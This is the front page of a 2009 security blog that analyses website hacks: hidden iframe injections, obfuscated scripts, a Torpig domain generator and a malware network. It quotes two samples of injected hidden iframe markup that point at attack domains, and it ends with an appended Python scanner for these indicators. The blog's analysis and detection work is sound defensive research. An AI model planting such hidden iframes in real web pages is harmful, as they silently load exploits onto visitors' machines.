Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.

From Hidden Iframes to Obfuscated Scripts

23 Dec 09   Filed in Website exploits with 52 Comments

In December, I noticed that the ubiquitous hidden iframes that have been the prevailing site hack this year seem to have disappeared. Unmask Parasites now finds them on very few sites. And even on infected sites, I see only old domains, while this attack is known for introducing at least one new domain every day and for frequently updating the iframe code on infected sites.

At the same time I noticed a new type of obfuscated scripts injected into hacked websites. And I believe it’s a new incarnation of the same attack that previously injected hidden iframes.
Here’s the story »»

Intermediaries to Torpig Attack Sites

15 Dec 09   Filed in Website exploits with 1 Comment

In the previous post, I reviewed a website hack that injected malicious scripts that used the Twitter API to generate domain names for attack sites. The domain names of the attack sites changed twice a day.

However, since the malicious script works on the client side, the algorithm of the domain name generator can be easily extracted and used to predict upcoming malicious domains. To demonstrate this, I created my online “Torpig Domain Generator”, which displays the currently used attack site and the domains of the two upcoming attack sites. It has been working for more than a week now and so far it is very accurate. (For unknown reasons, hackers didn’t activate malicious domains this past Saturday, but infected sites still redirected to the same domains predicted by my generator.)

The fact that the algorithm is open and the domain names of the upcoming malicious sites are known even before hackers register them means that anyone who wants to stop the attack can pre-register those domains (so far it looks like no one has a spare $20/day for this). The same algorithm can be used to proactively blacklist malicious domain names.

I’m sure hackers are aware of these downsides of open algorithms. Now they are trying to keep the advantage of frequently changing pseudorandom domain names while hiding the algorithm of the domain name generator behind intermediary redirector servers.
Here’s the story »»

Tweet Week: Nov 2-8, 2009

08 Nov 09   Filed in Tweet Week with Comments Off on Tweet Week: Nov 2-8, 2009

Selected short messages and links you might have missed if you don’t follow me on Twitter.

Nov 2, 2009

Mal/Iframe-N: Another winning infection? – Sophos on malicious iframes (with references to my blog posts)

Nov 3, 2009

How to search for ‘backdoors’ in a hacked WordPress site

Nov 5, 2009

Story about Gumblar breaking WordPress on The New York Times site – based on my latest blog post. Thanks @bobmcmillan

New security patches for Java and Shockwave Player

Nov 6, 2009

SCMagazine mentions my blog in their article “Gumblar site infections return, WordPress among affected”

Found an AdSense ad that offers to download a pirated version of Avast Pro (probably infected). Reported it to Google. (lifeplain .com is a scam)

If you want more real-time experience, you can follow @unmaskparasites on Twitter.


Tweet Week: Oct 26 – Nov 1, 2009

01 Nov 09   Filed in Tweet Week with Comments Off on Tweet Week: Oct 26 – Nov 1, 2009

Selected short messages and links you might have missed if you don’t follow me on Twitter.

Oct 26, 2009

[link:Sophos blog] New type of hidden malicious iframes

Oct 28, 2009

[milestone] 50 blog posts on (in less than a year)

Security updates are available for Firefox 3/3.5 and Opera 10. Make sure to update your browser ASAP

Oct 30, 2009

I published a “beta” of my Practical Guide to Dealing With Google’s Malware Warnings – need your feedback. Thanks

How to find a backdoor in a hacked WordPress – great article

Oliver Fisher (Google Anti-Malware) on Google’s automated malware scanners and warnings

If you want more real-time experience, you can follow @unmaskparasites on Twitter.


Buggy Malware: Iframes Eat Web Pages

29 Oct 09   Filed in Website exploits with 7 Comments

Yesterday, when I wrote about hidden iframes, I forgot to mention one interesting side effect of the new iframes with “onload” scripts – they eat web pages.

Actually, those iframes don’t eat web pages themselves – it is done by the buggy software that hackers use to inject hidden iframes into legitimate web pages.
Here’s the story »»

Evolution of Hidden Iframes

28 Oct 09   Filed in Website exploits with 12 Comments

Injecting hidden malicious iframes into compromised legitimate websites is one of the most popular types of malware attacks. Invisible iframes allow exploits to be silently loaded from “bad” sites while unsuspecting web surfers browse the visible content of infected websites.

Iframes are rectangular elements of web pages into which you can load other web pages, either from the same site or from some third-party site (in other words, a web page inside a web page). There are many legitimate uses of iframes. The most common is ad blocks (e.g. Google displays AdSense in iframes).

Hiding iframes

I said above that iframes are rectangular elements that occupy some space on web pages. So how do hackers make them invisible?
Continue »»

Quicksilver Malware Network

17 Sep 09   Filed in Website exploits with 6 Comments

In my latest post about the iframe attack that used free domains from dynamic DNS hosting providers pointing to a network of compromised dedicated servers, I asked readers for any additional information they had about this attack. A few days later I received this email:

Hi there.

Since this May I have been watching this network (I named it “quicksilver”) after two PCs/users ran into cn-8080-iframe-modified websites. Using only “white hat” instruments (dig, whois, malzilla, VMWare, Google and my brain ;) ) I was able to collect information about the basic frame of this network.

It is not a simple botnet – it combines three networks with different functions to form a “malware superstructure”.

Nearly everything in this network is constantly moving (thus the name) and uses compromised machines acting as proxies or slaves. The machines of the real black hats are movable themselves – the older “gumblar” network (which I think is a precursor to quicksilver) used a Ukrainian C&C server with a different IP address.

At the end of the email, the reader said that he had a chart of this network and asked me if I wanted to take a look at it. The information looked interesting, so I asked if he would like to publish it on my blog and got his permission:

you have my explicit permission to publish everything I send you – anonymously. Although I have a name and a title, the only thing relevant is to unmask those networks.

So here it is. I’ve published the story as is. I only added some formatting and converted the chart to GIF format to avoid PDF security concerns.
Continue »»

Dynamic DNS and Botnet of Zombie Web Servers

11 Sep 09   Filed in Website exploits with 44 Comments

It’s always interesting to watch how malware attacks evolve over time.

Since this spring, when I started to distinguish it from other attacks, this hidden iframe injection attack has always been among the “leaders”.

  • They started with gambling-related .cn domains (like cheapslotplay .cn).
  • They introduced several new domain names every day so that you couldn’t hardcode them in your scanners. At this point, my records contain several hundred domains used in this attack.
  • They also changed campaign names (parameters they specify in iframe URLs) regularly: mozila, banner, cocacola, pepsi, open, reopen, income.
  • They used port 8080 (presumably to game dumb traffic filters that only inspect traffic on port 80).
  • At the end of July, they started to use 3-letter .ru, .pl, .in and .at domains (e.g. x3y .ru, f7y .at, q5n .in, a3j .pl).
  • And, finally, if you follow me on Twitter, you know that this week I started to notice 3rd-level domains registered with free dynamic DNS services.

Here are the details »»

Hidden CN Iframes Are Still Prevalent

25 Jun 09   Filed in Website exploits with 33 Comments

This post is a reminder that .cn iframe attacks are still among the leaders.

The URLs of malicious iframes change over time. Hackers introduce new suffixes (campaigns?) like mozila, banner, cocacola, pepsi, and add more and more domain names.

Port 8080

Since the pepsi campaign, they have been using port 8080 in the URLs.

The current form of the malicious code looks like this:

<iframe src="http:// namegamestore .cn:8080/index.php" width=118 height=195 style="visibility: hidden"></iframe>

It is usually injected at the bottom of index (home) pages.
Continue »»

Another Type of IFrame Hack (PHP Exploit)

29 Apr 09   Filed in Website exploits with 36 Comments

This is a quick post about yet another type of hidden iframes injected into legitimate web pages.

The HTML code may look like this:

<iframe src="http:// xtrarobotz .com/?click=BC0230" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

Domain names may vary, and the number of different iframes injected into a single web page may differ. The distinguishing feature of this exploit is the “?click=<hex_number>” part of the URL, where <hex_number> is some hexadecimal number.
Continue »»
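The hidden-iframe indicators from the two samples above (CSS visibility:hidden, 1x1 size, port 8080, a ?click=<hex> parameter) can be turned into a simple page scanner. This is an added example, not code from Unmask Parasites; the HTML it scans is constructed here with placeholder .invalid domains instead of the real attack domains.

```python
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlparse

# Constructed sample page: one legitimate ad iframe plus the two injected
# forms shown in the posts above. Domains are placeholders, not real ones.
SAMPLE_HTML = """
<html><body><p>Visible site content</p>
<iframe src="https://ads.example.com/banner" width=300 height=250></iframe>
<iframe src="http://bad-example.invalid:8080/index.php" width=118 height=195 style="visibility: hidden"></iframe>
<iframe src="http://other-bad.invalid/?click=BC0230" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
</body></html>
"""


class IframeCollector(HTMLParser):
    """Collects the attributes of every <iframe> start tag in a page."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})


def _dim(value):
    """Parse the leading integer of a width/height attribute ('1', '1px')."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


def suspicious_reasons(attrs):
    """Return the list of hidden-iframe indicators present in one iframe."""
    reasons = []
    style = attrs.get("style", "").replace(" ", "").lower()
    if "visibility:hidden" in style or "display:none" in style:
        reasons.append("hidden via CSS")
    w, h = _dim(attrs.get("width")), _dim(attrs.get("height"))
    if w is not None and h is not None and w * h <= 4:
        reasons.append(f"tiny size {w}x{h}")
    url = urlparse(attrs.get("src", ""))
    try:
        port = url.port  # raises ValueError on a malformed port
    except ValueError:
        port = None
    if port == 8080:
        reasons.append("non-standard port 8080")
    if any(re.fullmatch(r"[0-9A-Fa-f]+", v) for v in parse_qs(url.query).get("click", [])):
        reasons.append("?click=<hex> parameter")
    return reasons


def scan(html):
    """Return (src, reasons) for every iframe that triggers at least one indicator."""
    collector = IframeCollector()
    collector.feed(html)
    flagged = []
    for attrs in collector.iframes:
        reasons = suspicious_reasons(attrs)
        if reasons:
            flagged.append((attrs.get("src", ""), reasons))
    return flagged
```

A legitimate ad iframe produces no indicators, so only the two injected frames are reported, each with the reasons that matched.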